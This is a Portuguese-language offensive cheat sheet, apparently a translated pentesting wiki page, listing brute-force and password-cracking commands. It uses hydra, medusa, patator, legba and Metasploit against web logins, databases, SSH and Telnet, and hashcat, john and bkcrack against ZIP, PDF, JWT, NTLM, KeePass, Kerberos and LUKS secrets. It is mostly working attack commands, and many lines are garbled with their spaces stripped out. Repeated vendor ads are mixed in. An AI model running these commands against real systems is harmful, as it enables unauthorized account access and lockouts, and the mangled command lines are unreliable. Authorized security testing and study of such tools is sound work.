Encontre o máximo de informações sobre o alvo que puder e gere um dicionário personalizado. Ferramentas que podem ajudar:
Crunch
crunch460123456789ABCDEF-ocrunch1.txt#From length 4 to 6 using that alphabetcrunch44-f/usr/share/crunch/charset.lstmixalpha# Only length 4 using charset mixalpha (inside file charset.lst)@Lowercasealphacharacters,Uppercasealphacharacters%Numericcharacters^Specialcharactersincludingspaccrunch68-t,@@^^%%
Uma ferramenta geradora de listas de palavras, que permite que você forneça um conjunto de palavras, dando a você a possibilidade de criar múltiplas variações a partir das palavras fornecidas, criando uma lista de palavras única e ideal para usar em relação a um alvo específico.
Use Trickest para construir e automatizar fluxos de trabalho facilmente, impulsionados pelas ferramentas comunitárias mais avançadas do mundo.
Obtenha Acesso Hoje:
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
Para https você deve mudar de "http-post-form" para "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla ou (D)rupal ou (M)oodle
cmsmap-fW/J/D/M-ua-pahttps://wordpress.com# Check also https://github.com/evilsocket/legba/wiki/HTTP
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-tltickets.txt-ulusers.txt-hlhashes.txt-plpasswords.txt# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-ulusers.txt-hlhashes.txt-plpasswords.txt# Bruteforce using tickets against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-tltickets.txt-ulusers.txt# Bruteforce using passwords against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-ulusers.txt-plpasswords.txt# Bruteforce using hashes against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-ulusers.txt-hlhashes.txt
# hydrahydra-Lusernames.txt-Ppass.txt<IP>mysql# msfconsolemsf> useauxiliary/scanner/mysql/mysql_login; setVERBOSEfalse# medusamedusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
#Legbalegbamysql--usernameroot--passwordwordlists/passwords.txt--targetlocalhost:3306
OracleSQL
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.pypasswordguesser-s $SERVER -d $SID./odat.pypasswordguesser-s $MYSERVER -p $PORT --accounts-fileaccounts_multiple.txt#msf1msf> useadmin/oracle/oracle_loginmsf> setRHOSTS<IP>msf> setRPORT1521msf> setSID<SID>#msf2, this option uses nmap and it fails sometimes for some reasonmsf> usescanner/oracle/oracle_loginmsf> setRHOSTS<IP>msf> setRPORTS1521msf> setSID<SID>#for some reason nmap fails sometimes when executing this scriptnmap--scriptoracle-brute-p1521--script-argsoracle-brute.sid=<SID><IP>legbaoracle--targetlocalhost:1521--oracle-databaseSYSTEM--usernameadmin--passworddata/passwords.txt
Para usar oracle_login com patator você precisa instalar:
msf> useauxiliary/scanner/redis/redis_loginnmap--scriptredis-brute-p6379<IP>hydra–P/path/pass.txtredis://<IP>:<PORT># 6379 is the defaultlegbaredis--targetlocalhost:6379--usernameadmin--passworddata/passwords.txt [--redis-ssl]
legbasftp--usernameadmin--passwordwordlists/passwords.txt--targetlocalhost:22# Try keys from a folderlegbasftp--usernameadmin--password'@/some/path/*'--ssh-auth-modekey--targetlocalhost:22
#Use the NetBIOS name of the machine as domaincrackmapexecmssql<IP>-d<DomainName>-uusernames.txt-ppasswords.txthydra-L/root/Desktop/user.txt–P/root/Desktop/pass.txt<IP>mssqlmedusa-h<IP>–U/root/Desktop/user.txt–P/root/Desktop/pass.txt–Mmssqlnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
SSH
hydra-lroot-Ppasswords.txt [-t 32]<IP>sshncrack-p22--userroot-Ppasswords.txt<IP> [-T 5]medusa-uroot-P500-worst-passwords.txt-h<IP>-Msshpatator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legbassh--usernameadmin--passwordwordlists/passwords.txt--targetlocalhost:22# Try keys from a folderlegbassh--usernameadmin--password'@/some/path/*'--ssh-auth-modekey--targetlocalhost:22
Chaves SSH fracas / PRNG previsível do Debian
Alguns sistemas têm falhas conhecidas na semente aleatória usada para gerar material criptográfico. Isso pode resultar em um espaço de chave dramaticamente reduzido que pode ser atacado por força bruta com ferramentas como snowdroppe/ssh-keybrute. Conjuntos pré-gerados de chaves fracas também estão disponíveis, como g0tmi1k/debian-ssh.
STOMP (ActiveMQ, RabbitMQ, HornetQ e OpenMQ)
O protocolo de texto STOMP é um protocolo de mensagens amplamente utilizado que permite comunicação e interação contínuas com serviços populares de enfileiramento de mensagens como RabbitMQ, ActiveMQ, HornetQ e OpenMQ. Ele fornece uma abordagem padronizada e eficiente para trocar mensagens e realizar várias operações de mensagens.
hydra-lroot-Ppasswords.txt [-t 32]<IP>telnetncrack-p23--userroot-Ppasswords.txt<IP> [-T 5]medusa-uroot-P500-worst-passwords.txt-h<IP>-Mtelnetlegbatelnet \--username admin \--password wordlists/passwords.txt \--target localhost:23 \--telnet-user-prompt "login: " \--telnet-pass-prompt "Password: " \--telnet-prompt ":~$ " \--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
Ataque de zip com texto simples conhecido
Você precisa conhecer o texto simples (ou parte do texto simples) de um arquivo contido dentro do zip criptografado. Você pode verificar nomes de arquivos e tamanhos de arquivos contidos dentro de um zip criptografado executando: 7z l encrypted.zip
Baixe bkcrackda página de lançamentos.
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password
7z
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
PDF
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
Quebra de NTLM
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Keepass
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Keberoasting
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Método 2
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
Chave privada PGP/GPG
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Se você tiver um arquivo xlsx com uma coluna protegida por senha, você pode desprotegê-la:
Faça o upload para o google drive e a senha será removida automaticamente
Para remover manualmente:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .
Certificados PFX
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
Use Trickest para construir e automatizar fluxos de trabalho facilmente, impulsionados pelas ferramentas comunitárias mais avançadas do mundo.
Obtenha Acesso Hoje:
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
Ataque combinador de wordlist
É possível combinar 2 wordlists em 1 com hashcat.
Se a lista 1 contiver a palavra "hello" e a segunda contiver 2 linhas com as palavras "world" e "earth". As palavras helloworld e helloearth serão geradas.
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
Ataque de máscara (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
Use Trickest para construir e automatizar fluxos de trabalho facilmente, impulsionados pelas ferramentas comunitárias mais avançadas do mundo.
Acesse hoje: